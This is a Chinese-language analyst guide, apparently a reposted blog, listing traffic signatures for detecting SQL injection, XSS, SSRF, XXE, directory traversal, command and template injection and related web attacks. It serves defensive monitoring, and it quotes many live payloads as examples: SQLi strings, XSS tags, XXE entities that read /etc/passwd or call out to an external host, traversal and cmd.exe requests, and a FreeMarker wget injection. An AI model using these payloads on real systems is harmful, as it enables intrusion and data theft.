常见漏洞的流量特征

 

1、SQL注入漏洞

 查看url / Referer字段/User-Agent字段/cookie字段

  1. 出现一些特殊字符(eg:单引号【‘】、双引号【“”】、括号【()】、单引号括号【‘(】、双引号括号【“(】等一些常见的特殊的字符);

      eg:http://localhost/index.php/?id=1'and+1=1--+

eg:http://localhost/index.php/?id=1 and 1=1 -- -和1 and 1=2 --+

 

  1. 出现SQL命令/语句(增加、删除、修改、查询语句或者各语句之间的串接)

eg:url/?id=1"  and  updatexml(1,concat(0x7e,(select group_concat(username) from users),0x7e),1) -- -

eg:url/?id=-1' union select 1,group_concat(schema_name),3 from  information_schema.schemata --+

 

  1. 出现注释符号(在语句的最后出现连续2个减号字元 -- 后的    文字为注解,或“/*”与“*/”所包起来的文字为注解)

 

  1. 在url上出现万能密码字段  'or'1'='1

 

  1. 出现常见的特殊函数

  database()、updatexml()、extractvalue()、group_concat()、concat()、limit()、order by()、unsion()、system_user()、version()、load_file()、seelp()、length()、exp()、group by()、substr()、and、or等函数。

 

eg:?id=1” and updatexml(1,concat(0x7e,database()),3) --+

eg:?id=-1’ union select 1,2,seelp(5)--+

eg:1” union select updatexml(1,concat(0x7e,(select     group_concat(username) from users)),1) #

  1. 出现各种编码(eg:url编码,base64编码等)可利用Burp或 者在线解/编码器进行操作查看是否有特殊字段。
  2. user-agent字段出现sqlmap/1.0.8.15#dev (http://sqlmap.org)

20230724024159.png?origin_url=file%3A%2F%2F%2FC%3A%5CUsers%5Clenovo%5CAppData%5CLocal%5CTemp%5Cksohtml2912%5Cwps1.jpg&pos_id=rbZyoezU

20230724024159.png?origin_url=file%3A%2F%2F%2FC%3A%5CUsers%5Clenovo%5CAppData%5CLocal%5CTemp%5Cksohtml2912%5Cwps2.jpg&pos_id=2MWezksu

1.1 DNSlog注入

Load_file函数,功能是读取文件并返回文件内容为字符串。(访问互联网中的文件时,需要在最前面加上两个斜杠 //)

使用本函数有几个前提:
1、首先要有注入点
2、需要有root权限
3、数据库有读写权限即:secure_file_priv=“”
4、得有请求url权限
5、还必须得是windows服务器

 

concat函数

2、XSS(跨站脚本攻击)漏洞

查看url / Referer字段/User-Agent字段/cookie字段

查看是否出现以下各种标签(但不限于以下标签)

  1. 查看是否出现script标签<script>alert(1);</script>
  2. 查看是否出现img标签<img src=1 οnerrοr=alert(1);>
  3. 查看是否出现input标签<input οnfοcus=alert(1);>
  4. 查看是否出现svg 标签<svg οnlοad=alert(1);>
  5. 查看是否出现select 标签<select οnfοcus=alert(1)></select>
  6. 查看是否出现iframe 标签<iframe οnlοad=alert(1);></iframe>

 例如:

GET:/CuteSoft_Client/'"()&%<ScRiPt >prompt(994848)</ScRiPt>/SpellCheck.aspx HTTP/1.1  

Referer: http://emp.bcu.edu.cn/

GET /error_page.htm?flag='+alert('XSS')+' HTTP/1.1

<style type="text/javascript">alert('xss');</style>

<style>@import'javascript:alert("xss")';</style>

<link rel="stylesheet" href="http://ha.ckers.org/xss.css">  

  1. 这些标签里是否有一些危险函数【eval()函数、system()函数等】    或者直接出现这写标签后分析里面的语句看他要获取哪些信息。
  2. 若以上标签里的内容出现各种类型的编码、双写/大小写标签、各种特殊字符进行过滤都要着重看。
  3. user-agent字段出现 :     '%22()%26%25<ScRiPt%20>prompt(961668)</ScRiPt>

告警相关示例:

20230724024159.png?origin_url=file%3A%2F%2F%2FC%3A%5CUsers%5Clenovo%5CAppData%5CLocal%5CTemp%5Cksohtml2912%5Cwps3.jpg&pos_id=6s5Pn9Ge

url   %0D%0A%3C%2Ftte%3E%3Cscript%3Ea ert%28myhd%29%3B%3C%2Fscpt%3E8au

20230724024159.png?origin_url=file%3A%2F%2F%2FC%3A%5CUsers%5Clenovo%5CAppData%5CLocal%5CTemp%5Cksohtml2912%5Cwps4.jpg&pos_id=PlQ6Dnov

url解密出来的函数是恶意函数aert()以及script标签来获取账号

20230724024159.png?origin_url=file%3A%2F%2F%2FC%3A%5CUsers%5Clenovo%5CAppData%5CLocal%5CTemp%5Cksohtml2912%5Cwps5.jpg&pos_id=c4gVwlWD

3、CSRF(跨站请求伪造)漏洞

查看Referer字段,正常来说,Referer字段应和请求的地址位于同一域名下。而如果是CSRF攻击传来的请求,Referer字段会是包含恶意网址的地址,不会在同一个域名下,这时候服务器就能识别出恶意的访问。所以在查看csrf告警时,看域名是否有相同的后缀,是否是来自本站

20230724024159.png?origin_url=file%3A%2F%2F%2FC%3A%5CUsers%5Clenovo%5CAppData%5CLocal%5CTemp%5Cksohtml2912%5Cwps6.jpg&pos_id=cSVcnu1C

4、SSRF(服务器端请求伪造)漏洞

  1. 查看url上是否有file协议/gopher协议/ftp协议/dict协议

例  http://127.0.0.1/pikachu/vul/ssrf/ssrf_curl.php?url=file:///c:/windows/system.ini(获取本地c盘的system.ini文件)

  1. (查看url地址后面一些参数(share、wap、url、link、src、source、target、u、3g、display、sourceURl、imageURL、domain等)这些参数后面的值是不是内网的IP地址或者是127.0.0.1或者是一些协议的一些关键字眼。
  2. 这些参数值的后面是否有特殊字符(绕过ssrf会使用一些特殊字符eg:‘。’‘[: :]’等一些特殊的字符),也可能出现各种编码/进制进行写IP地址,或者特殊的域名eg:xip.io。
  3. 是否出现file_get_contents()、fsockopen()、curl_exec()等函数

5、XXE(外部实体注入)漏洞

  1. 若攻击报文出现一下告警,大概率是误报,因为这个是电信的L1接口定位采用的是xml格式的报文,所以会产生告警

20230724024159.png?origin_url=file%3A%2F%2F%2FC%3A%5CUsers%5Clenovo%5CAppData%5CLocal%5CTemp%5Cksohtml2912%5Cwps7.jpg&pos_id=1jJjzx73

  1. 若报文中的system后面出现了url,要着重注意,(因为外部实体的声明使用SYSTEM关键字,并且必须指定一个URL,从该URL可以加载实体的值。)

例如:

<!DOCTYPE foo [ <!ENTITY ext SYSTEM "http://normal-website.com" > ]>

 

<!DOCTYPE foo [ <!ENTITY ext SYSTEM "file:///path/to/file" > ]>

 

<!DOCTYPE foo [ <!ENTITY ext SYSTEM "php://filter://path/to/file" ]>

 

   <!ENTITY lyq SYSTEM "file:///etc/passwd">

 

着重看以下3个协议

·data://协议    

·file://协议加文件上传    

·php://filter协议加文件上传

 

 

参考Content-Type字段的值,

告警示例:

GET /meol/manage/web.config.bak HTTP/1.1

Content-Type: text/xml;charset=utf-8

Accept字段

告警示例:

GET /meol/manage/web.config.bak HTTP/1.1

Accept=application/xml,text/xml,*/*;q=0.01

X-Requested-With字段

告警示例:

GET /meol/manage/web.config.bak HTTP/1.1

X-Requested-With:XMLHttpRequest

结合告警中是否有xml的payload,一般在告警最下面显示。

 

payload示例:

<?xml version="1.0"?>

<!DOCTYPE ANY [

    <!ENTITY % d SYSTEM

   "http://t606r6jh3sa4nrjus0ks29kwbnhe53.burpcollaborator.net">%d;

     ]>

<a>&xxe;</a>

总结:出现xml的文件或者后缀都着重看一下。

6、资源盗链漏洞

通过查看Referer字段或者签名,是否有外来网站,来源不是本站,只能通过Referer字段来进行判断,看是否有新的外来地址。着重看以http和https开头的网址。

7、目录遍历

   如果url上有大量的../../../../../../关键字符就有可能攻击者利用目录遍历来攻击,也要结合../后面是什么目录,若是敏感目录或者文件(例如:/etc/passwd、php后缀、conf后缀等)就要着重看一下,或者url上是各种编码,要进行解码进行查看内容

目录遍历漏洞的特征要注意:

?page=xxx.php  ?index=xxx.jsp    ?home=xxx.html   ?file=content      最终也要结合响应包进行最终确认是否攻击成功,是否响应。

告警示例:

20230724024159.png?origin_url=file%3A%2F%2F%2FC%3A%5CUsers%5Clenovo%5CAppData%5CLocal%5CTemp%5Cksohtml2912%5Cwps8.jpg&pos_id=N4lz64mL

通过UTF-8解码之后再进行url解码得出

ba.online.sh.cn/../../../../../../../../../../../../../../../../../../../../etc/passwd

20230724024159.png?origin_url=file%3A%2F%2F%2FC%3A%5CUsers%5Clenovo%5CAppData%5CLocal%5CTemp%5Cksohtml2912%5Cwps9.jpg&pos_id=mXjF70YX

8、命令执行注入

  1. 如果请求体或者url里出现以下危险函数

  【1】 php代码

system()、exec()、shell_exec()、passthru函数

popen函数  eval函数 assert()

【2】JSP代码

Runtime run = Runtime.getRuntime(); run.exec("ipconfig");

【3】ASP代码

<%Response.writeCreateObject("wscript.shell").exec("cmd.exe /c    ipconfig").StdOut.ReadAll%>

  1. 若里面还有特殊字符(|,||,&,&&,反符号` `,>,>>,< ,<<)
  2. 出现系统命令、系统目录、敏感文件等

相关告警示例:

GET /simple/tests/tmssql.php?do=phpinfo

GET /detail.php?id=/winnt/system32/cmd.exe?/c+dir+c:%5c

GET /cgi/maker/ptcmd.cgi?cmd=;cat+/tmp/config/usr.ini

GET /cgi/maker/ptcmd.cgi?cmd=;cat+/etc/passwd

8.1 freemaker模版注入

deviceUdid=${"freemarker.template.utility.Execute"?new()("wget http://downlo%6

<#assign test="freemarker.template.utility.Execute"?new()> ${test("open /Applications/Calculator.app")}

error=&deviceUdid=${"freemarker.template.utility.Exe%6

8.2  WinRAR远程代码执行漏洞分析

20230724024159.png?origin_url=file%3A%2F%2F%2FC%3A%5CUsers%5Clenovo%5CAppData%5CLocal%5CTemp%5Cksohtml2912%5Cwps10.jpg&pos_id=mfPF2YK7

如果把响应代码更改为“301 Moved Permanently”,所有请求都将转到恶意域“attacker.com”,并且恶意域“attacker.com”会被缓存下来。缓存下来以后,所有到默认域“notifier.rarlab.com”的流量会重定向到恶意域“attacker.com”。

20230724024159.png?origin_url=file%3A%2F%2F%2FC%3A%5CUsers%5Clenovo%5CAppData%5CLocal%5CTemp%5Cksohtml2912%5Cwps11.jpg&pos_id=Z5McbM8K

9、LDAP注入

定义

LDAP轻量级目录访问协议,是一种在线目录访问协议,主要用于目录中资源的搜索和查询。

如果出现一些运算符(=、|、||、&、&&、!(非)、*(通配符)等),因为这些运算符都是LDAP的基本语法。

例如:

ldap://austin.ibm.com/ou=Austin,o=IBM

ldap:///ou=Austin,o=IBM??sub?(cn=Joe Q. Public)

LDAP注入攻击面

(&(parameter1=value1)(parameter2=value2))

value1和value2可以换成注入代码

 

10、文件包含漏洞

文件包含会出现4个函数:

include()   include_once()   require()  require_once()

出现4个函数后结合响应体着重看一下

url也会出现特殊字符../../等特殊字符

一般文件包含和文件上传会结合使用。

11、文件上传漏洞

http 请求 Header 头部中的 Content-Type 存在以下特征:

multipart/form-data:表示该请求是一个文件上传请求

存在 boundary 字符串

POST 的内容存在以下特征: Content-Disposition name filename

 

查看文件的后缀是以.php  .php1~5  php的大小写或者.asp、.asp的大小写混合,或者以.htaccess结尾的,还有图片马要着重注意

 

12、信息泄露

配置文件访问

httpd.conf htaccess HTPASSWD boot.ini etc/passwd

Php.ini Web.xml等后缀文件,然后结合响应体查看是否响应

 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://xiahunao.cn/news/2815822.html

如若内容造成侵权/违法违规/事实不符,请联系瞎胡闹网进行投诉反馈,一经查实,立即删除!

相关文章

改进的yolo交通标志tt100k数据集目标检测(代码+原理+毕设可用)

YOLO TT100K: 基于YOLO训练的交通标志检测模型 在原始代码基础上&#xff1a; 修改数据加载类&#xff0c;支持CoCo格式&#xff08;使用cocoapi&#xff09;&#xff1b;修改数据增强&#xff1b;validation增加mAP计算&#xff1b;修改anchor&#xff1b; 注: 实验开启weig…

HUAWEI 华为交换机 配置基于VLAN的MAC地址学习限制接入用户数量 配置示例

组网需求 如 图 2-15 所示&#xff0c;用户网络 1 通过 LSW1 与 Switch 相连&#xff0c; Switch 的接口为 GE0/0/1 。用户网络2通过 LSW2 与 Switch 相连&#xff0c; Switch 的接口为 GE0/0/2 。 GE0/0/1 、 GE0/0/2 同属于 VLAN2。为控制接入用户数&#xff0c;对 VLAN2 进…

蓝桥杯 最多约数

242*2*2*3&#xff08;质因子&#xff09;&#xff0c;约数&#xff08;11&#xff09;*&#xff08;11&#xff09;*&#xff08;11&#xff09;*&#xff08;11&#xff09;8 #include <bits/stdc.h> using namespace std; int main(){int a[700]{393353, 901440, 1234…

【React 报错】—Remove untracked files, stash or commit any changes, and try again.

【React 报错】—Remove untracked files, stash or commit any changes, and try again. 在react项目中通过.less文件进行样式定义&#xff0c;先暴露webpack配置文件&#xff0c;执行命令&#xff1a;yarn eject 或 npm run eject&#xff0c;报错如下&#xff1a; 原因是因…

第七十天 APP攻防-微信小程序解包反编译数据抓包APK信息资源提取

第70天 APP攻防-微信小程序&解包反编译&数据抓包&APK信息资源提取 知识点&#xff1a; 0、APK信息资源提取 1、微信小程序致据抓包 2、做信小程序解包反编译 1、信息收集应用8资产提取&权限等 2、漏润发现-反编泽&脱壳&代码审计 3、安全评估组件8散密…

李沐动手学习深度学习——3.2练习

以下是个人理解&#xff0c;希望进行讨论求解。 练习 1. 如果我们将权重初始化为零&#xff0c;会发生什么。算法仍然有效吗&#xff1f; 根据SGD算法公式如上&#xff0c;第一次迭代的值可知w只与b相关&#xff0c;而对于b的迭代更新&#xff0c;只是与b的初始值相关&#x…

【机器学习】线性回归模型(Linear Regression)

&#x1f338;博主主页&#xff1a;釉色清风&#x1f338;文章专栏&#xff1a;机器学习&#x1f338;今日语录:温柔的一半是知识&#xff0c;没有知识的涵养撑不起你想要的风骨。 ☘️0文章预览 本系列文章主要是根据吴恩达老师的机器学习课程以及自己的理解整合而成&#xf…

自动化操作读写Excel —— xlrd 和 xlwt 模块参数说明与代码实战【第95篇—自动化操作读写Excel 】

自动化操作读写Excel —— xlrd 和 xlwt 模块参数说明与代码实战 在日常工作中&#xff0c;Excel表格是不可或缺的数据处理工具。为了提高工作效率&#xff0c;Python中的xlrd和xlwt模块为我们提供了强大的功能&#xff0c;使得自动化操作Excel变得更加简便。本文将介绍xlrd和…

npm 最新淘宝镜像配置 + nrm工具配置及使用

一、前言 npm 淘宝镜像已经从 registry.npm.taobao.org 切换到了 registry.npmmirror.com &#xff08;HTTPS 证书到期不能用了&#xff09; 二、直接命令配置 1、执行以下命令即可切换淘宝源 npm config set registry https://registry.npmmirror.com/2、执行以下命令即可…

重拾前端基础知识:JavaScript

重拾前端基础知识&#xff1a;JavaScript 前言使用JavaScript输出语法运算符条件语句循环数据类型字符串数字数组对象日期函数 数学正则表达式异常处理类集合模块JSON闭包异步调试DOM&#xff08;文档对象模型&#xff09;事件事件监听器表单 BOM&#xff08;浏览器对象模型&am…

基于vue的图书管理系统的设计与实现

高校师生在教学中承受的压力越大就对知识拥有了更多的需求&#xff0c;而满足这一需求的最佳场所无疑就是图书馆。当前虽然信息技术在各个方面都发挥出重要作用&#xff0c;但是在相当多的高校图书馆中依然由工作人员手动完成图书借阅、归还及逾期提醒等所有工作&#xff0c;在…

03OpenCV图像的掩膜操作

文章目录 掩膜操作提高图像的对比度获取图像像素制作图像掩膜算子防止像素溢出算子全部代码 掩膜操作提高图像的对比度 红色是中心像素&#xff0c;从上到下&#xff0c;从左到右对每个像素做同样的处理操作&#xff0c;得到最终结果就是对比度提高之后的输出图像Mat对象 注&am…

【全志D1-H 哪吒开发板】Debian系统安装调教和点灯指南

全志D1-H开发板【哪吒】使用Deabian系统入门 特别说明&#xff1a; 因为涉及到操作较多&#xff0c;博文可能会导致格式丢失 其中内容&#xff0c;会根据后续使用做优化调整 目录&#xff1a; 参考资料固件烧录启动调教点灯问题 〇、参考资料 官方资料 开发板-D1开发板【…

NLP-词向量、Word2vec

Word2vec Skip-gram算法的核心部分 我们做什么来计算一个词在中心词的上下文中出现的概率&#xff1f; 似然函数 词已知&#xff0c;它的上下文单词的概率 相乘。 然后所有中心词的这个相乘数 再全部相乘&#xff0c;希望得到最大。 目标函数&#xff08;代价函数&#xff0…

本届挑战赛季军方案:基于图网络及LLM AGENT的微服务系统异常检测和根因定位方法

aiboco团队荣获本届挑战赛季军。该团队来自亿阳信通。 方案介绍 本届挑战赛采用开放式赛题&#xff0c;基于建行云龙舟运维平台的稳定性工具和多维监控系统&#xff0c;模拟大型的生活服务APP的生产环境&#xff0c;提供端到端的全链路的日志、指标和调用链数据。参赛队伍在组…

#LLM入门|Prompt#2.2_ AI 应用开发的范式_Language_Models,the_Chat_Format_and_Tokens

在本章中&#xff0c;我们将和您分享大型语言模型&#xff08;LLM&#xff09;的工作原理、训练方式以及分词器&#xff08;tokenizer&#xff09;等细节对 LLM 输出的影响。 我们还将介绍 LLM 的提问范式&#xff08;chat format&#xff09;&#xff0c;这是一种指定系统消息…

YOLOv8改进 | 独家创新篇 | 结合SOTA思想利用双主干网络改进YOLOv8(全网独家创新,最重磅的更新)

一、本文介绍 本文给大家带来的改进机制是结合目前SOTAYOLOv9的思想利用双主干网络来改进YOLOv8(本专栏目前发布以来改进最大的内容,同时本文内容为我个人一手整理全网独家首发 | 就连V9官方不支持的模型宽度和深度修改我都均已提供,本文内容支持YOLOv8全系列模型从n到x均可…

【STM32】STM32学习笔记-WDG看门狗(46)

00. 目录 文章目录 00. 目录01. WDG简介02. IWDG概述03. IWDG框图04. IWDG键寄存器05. WWDG简介06. WWDG框图07. WWDG工作特性08. IWDG和WWDG对比09. 预留10. 附录 01. WDG简介 WDG&#xff08;Watchdog&#xff09;看门狗 看门狗可以监控程序的运行状态&#xff0c;当程序因为…

eltable 合计行添加tooltip

eltable 合计行添加tooltip 问题描述&#xff1a; eltable 合计行单元格内容过长会换行&#xff0c;需求要求合计行数据超长显示 … &#xff0c;鼠标 hover 时显示提示信息。 解决方案&#xff1a;eltable合计行没有对外的修改接口&#xff0c;想法是 自己实现一个tooltip&a…

【GB28181】wvp-GB28181-pro快速修改登录页面名称(前端)

引言 作为一个非前端开发人员,自己摸索起来比较费劲,也浪费了很多时间 本文快速帮助开发者修改为自己名称的一个国标平台 文章目录 一、 预期效果展示二、 源码修改-前端三、 验证修改效果一、 预期效果展示 二、 源码修改-前端 需要修改的文件位置: 项目工程下web_src目录…